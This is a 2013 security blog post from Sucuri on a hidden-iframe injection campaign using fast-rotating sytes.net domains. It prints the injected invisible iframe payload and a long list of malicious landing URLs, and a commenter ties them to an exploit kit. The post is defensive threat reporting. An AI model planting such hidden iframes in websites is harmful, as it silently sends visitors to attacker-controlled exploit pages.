• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malware iFrame Campaign from Sytes(.)net

October 3, 2013Daniel Cid

FacebookTwitterSubscribe

For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that has been injecting iframes from random domains from sytes(.)net into compromised sites.

Malicious iframe injection is nothing new, the bad guys have been using no-ip.org domains for a long time. But what is catching our attention is how often these domains are changing and how short a life-span they have.

This is the payload being added to the compromised sites:

<iframe src="httX:// krbnomrhp.sytes.net:12601 /cart/manuallogin/linktous.php?guardian=82" 
    width=1 height=1 style="visibility: hidden"></iframe>

As you can see, it is a normal iframe injection. But that domain will go offline in approximately 30 minutes and get replaced by a new one. Here is a list we compiled over the past 24 hours:

     40 http://snbkjmv.sytes.net:9101/htbin/clickheat/virus.php?spamnav=82"
     35 http://rvpyhfkjrf.sytes.net:9101/url/uploads/virus.php?spamnav=82"
     34 http://yhmpzoav.sytes.net:9101/mchat/descs/temp_order/punknown.php?power=82"
     30 http://yerepkhayq.sytes.net:9101/vmailadmin/proxy/wp-admin/virus.php?spamnav=82"
     30 http://knkkmprda.sytes.net:9101/dbadmin/virus.php?spamnav=82"
     28 http://nmmmdbhh.sytes.net:12601/mysql/gentoo.php?deals=82"
     27 http://sumghmrs.sytes.net:9101/classes/temp_order/components/virus.php?spamnav=82"
     27 http://lvvfafoylf.sytes.net:9101/srv/virus.php?spamnav=82"
     26 http://rvpyhfkjrf.sytes.net:9101/t/virus.php?spamnav=82"
     26 http://ndcdkba.sytes.net:9101/ip/search/stonemanor/punknown.php?power=82"
     24 http://sgkiipjali.sytes.net:12601/archive/administr8/admin4_colon/gentoo.php?deals=82"
     24 http://nmmmdbhh.sytes.net:12601/phpldapadmin/phpsysinfo/photos/gentoo.php?deals=82"
     24 http://mpuizserdk.sytes.net:9101/skins/virus.php?spamnav=82"
     23 http://zzaisucp.sytes.net:9101/cadmins/adm/options/virus.php?spamnav=82"
     23 http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"
     23 http://vzfxlctk.sytes.net:9101/bitmaps/competition/download/virus.php?spamnav=82"
     23 http://hmbgmijz.sytes.net:9101/video/cgi-perl/tag/outdoors.php?cert=82"
     22 http://xpvcrpf.sytes.net:9101/log_order/punknown.php?power=82"
     22 http://xivzwmojg.sytes.net:9101/admin_includes/config/public/virus.php?spamnav=82"
     22 http://sgkiipjali.sytes.net:12601/roman/gentoo.php?deals=82"
     22 http://knkkmprda.sytes.net:9101/command/virus.php?spamnav=82"
     22 http://kahfcjkg.sytes.net:12601/project/event.php?technical=82"
     22 http://iuxvbhxrp.sytes.net:9101/logo_sysadmin/dev/buy/punknown.php?powe
     22 http://hjzdenbi.sytes.net:9101/cpanel_file/film.php?photos=82"
     21 http://sumghmrs.sytes.net:9101/c0de/virus.php?spamnav=82"
     21 http://irpuxtox.sytes.net:9101/class/bitmaps/virus.php?spamnav=82"
     20 http://vtummjhpb.sytes.net:9101/source/outdoors.php?cert=82"
     20 http://ntygkznp.sytes.net:9101/examples/system-administration/admin_files/outdoors.php?cert=82"
     20 http://nswdmekq.sytes.net:9101/full/sec/virus.php?spamnav=82"
     20 http://ngoydafv.sytes.net:12601/picture_library/htm/gentoo.php?deals=82"
     20 http://mnzzgocsjh.sytes.net:9101/tmp/engine/virus.php?spamnav=82"
     20 http://mnwpkrqbu.sytes.net:12601/admin4_colon/gentoo.php?deals=82"
     20 http://lzrbccmyh.sytes.net:9101/support/outdoors.php?cert=82"
     20 http://knkkmprda.sytes.net:9101/administrators/options/virus.php?spamnav=82"
     20 http://idbosrxgg.sytes.net:9101/session/virus.php?spamnav=82"
     20 http://fgsbmtad.sytes.net:9101/2007/daily/virus.php?spamnav=82"
     20 http://eljbpjfwg.sytes.net:9101/advanced/punknown.php?power=82"
     20 http://dphtmdd.sytes.net:9101/feed/javascript/sql/virus.php?spamnav=82"
     19 http://vxvyvrf.sytes.net:9101/mysql/film.php?photos=82"
     19 http://ukmwzaum.sytes.net:9101/report/tmp/imode/virus.php?spamnav=82"
     19 http://ngoydafv.sytes.net:12601/titles/Lotus_Domino_Admin/maps/gentoo.php?deals=82"
     19 http://fiwailsko.sytes.net:9101/sshadmin/punknown.php?power=82"
     19 http://fgsbmtad.sytes.net:9101/daemon/virus.php?spamnav=82"
     18 http://zwwskaudp.sytes.net:9101/sshadmin/admin1/post/virus.php?spamnav=82"
     18 http://xlsymepe.sytes.net:9101/2003/punknown.php?power=82"
     18 http://ngoydafv.sytes.net:12601/wp-content/nwshp/conf/gentoo.php?deals=82"
     18 http://iljdfdiap.sytes.net:9101/bad/virus.php?spamnav=82"
     18 http://etaggovaql.sytes.net:9101/am/2006/special/punknown.php?power=82"
     18 http://bxluzpbq.sytes.net:9101/profile/wm/feedback/film.php?photos=82"
     17 http://yerepkhayq.sytes.net:9101/finance/virus.php?spamnav=82"
     17 http://vzfxlctk.sytes.net:9101/cpanel_file/zip/virus.php?spamnav=82"
     17 http://ukmwzaum.sytes.net:9101/adm2/virus.php?spamnav=82"
     17 http://mmqozpxrm.sytes.net:9101/haddan_files/punknown.php?power=82"
     17 http://kyicikarpu.sytes.net:9101/results/pm/screens/virus.php?spamnav=82"
     17 http://knhvdmsi.sytes.net:9101/pm/punknown.php?power=82"
     17 http://fowkvsqt.sytes.net:9101/money/admin/virus.php?spamnav=82"
     17 http://fkzsjei.sytes.net:9101/add/virus.php?spamnav=82"
     16 http://zwpcoxs.sytes.net:9101/server_admin_small/elements/film.php?photos=82"
     16 http://vzfxlctk.sytes.net:9101/useradmin/virus.php?spamnav=82"
     16 http://snbkjmv.sytes.net:9101/bbadmin/alterra/virus.php?spamnav=82"
     16 http://ovdqypgi.sytes.net:12601/relax/gentoo.php?deals=82"
     16 http://ovdqypgi.sytes.net:12601/2010/gentoo.php?deals=82"
     15 http://qrzugjjrw.sytes.net:9101/oplata/order/virus.php?spamnav=82"
     15 http://ozqsveikb.sytes.net:9101/avi/virus.php?spamnav=82"
     15 http://nnlwlvq.sytes.net:9101/article/downloads/include/virus.php?spamnav=82"
     15 http://knkkmprda.sytes.net:9101/banneradmin/virus.php?spamnav=82"
     15 http://enwebkwh.sytes.net:9101/product/virus.php?spamnav=82"
     15 http://coqptizgt.sytes.net:9101/data/outdoors.php?cert=82"
     15 http://axfhttqnl.sytes.net:9101/node/virus.php?spamnav=82"
     14 http://xglpjtlpbl.sytes.net:9101/help/outdoors.php?cert=82"
     14 http://xdxmziges.sytes.net:9101/tools/xyza/outdoors.php?cert=82"
     14 http://wwcrkkiu.sytes.net:9101/sshadmin/down/outdoors.php?cert=82"
     14 http://pkpmezztj.sytes.net:9101/beta/sbot/film.php?photos=82"
     14 http://owtppqzjh.sytes.net:9101/internal/proxy/autologin/film.php?photos=82"
     14 http://oggnxbyjwi.sytes.net:9101/backup/e107_handlers/partner/film.php?photos=82"
     14 http://oexwfsnp.sytes.net:9101/php/xfile/directadmin/virus.php?spamnav=82"
     14 http://oexwfsnp.sytes.net:9101/language/ccp14admin/style/virus.php?spamnav=82"
     14 http://nifhevj.sytes.net:9101/cache/sshadmin/inc/outdoors.php?cert=82"
     14 http://mpuizserdk.sytes.net:9101/page/author/misc/virus.php?spamnav=82"
     14 http://mkqydbik.sytes.net:9101/pass/outdoors.php?cert=82"
     14 http://lkgzbafam.sytes.net:9101/installation/outdoors.php?cert=82"
     14 http://lhruanxu.sytes.net:9101/software/virus.php?spamnav=82"
     14 http://kzaefdyx.sytes.net:9101/system/pic/nwshp/punknown.php?power=82"
     14 http://kzaefdyx.sytes.net:9101/admin4_account/punknown.php?power=82"
     14 http://kyicikarpu.sytes.net:9101/commercial/virus.php?spamnav=82"
     14 http://kdkudocdcj.sytes.net:9101/data/content/toolz/punknown.php?power=82"
     14 http://hjzdenbi.sytes.net:9101/ip/extras/null/film.php?photos=82"
     14 http://fiwailsko.sytes.net:9101/mysql_admin/punknown.php?power=82"
     14 http://cdjbdwcnb.sytes.net:9101/sysadmin/money/counters/virus.php?spamnav=82"
     14 http://augtohpklj.sytes.net:9101/plugins/user/house/virus.php?spamnav=82"
     14 http://anxytxwf.sytes.net:9101/addnews/punknown.php?power=82"
     13 http://zrsbhxi.sytes.net:9101/titles/cpanel/themes/virus.php?spamnav=82"
How are the sites getting compromised?

This is a question we often get, but unfortunately, we don’t get access to all the sites that we monitor or that we can query externally. So we can’t really pinpoint the exact source of initial compromise.

However, we do know that most sites with it are either running outdated versions of Joomla or WordPress. So we can speculate what is causing it.

Also remember, while we can’t say how it’s happening, we do know that those on our CloudProxy product have not experienced any issues as we protect from similar attacks.

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Jugar Jugar

    October 4, 2013

    The website it is essential to build a good firewall and security information is inevitable. Recently, malware has invaded from your web server to the user, this really makes us confused to worry about the safety of our lap top and another line

  2. Para Friv

    October 5, 2013

    Still do not understand about this content, really thank you for sharing information.

  3. Kjetil

    October 9, 2013

    These are all landing pages related to Sweet Orange exploit kit.

  4. pyby

    October 9, 2013

    nasty malware, im working on it. It uses EXIF in JPEGS to execute malware!

    check my blog: http://www.vsx.pl/malware-php-iframe-powiazany-z-sytes-net-cookie-dsgfdg34g-htaccess-zmieniony/

  5. vtedesco

    November 4, 2013

    If that can help you : I have found the malware code in a joomla website in the file “/libraries/joomla/factory.php” (line 15)

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.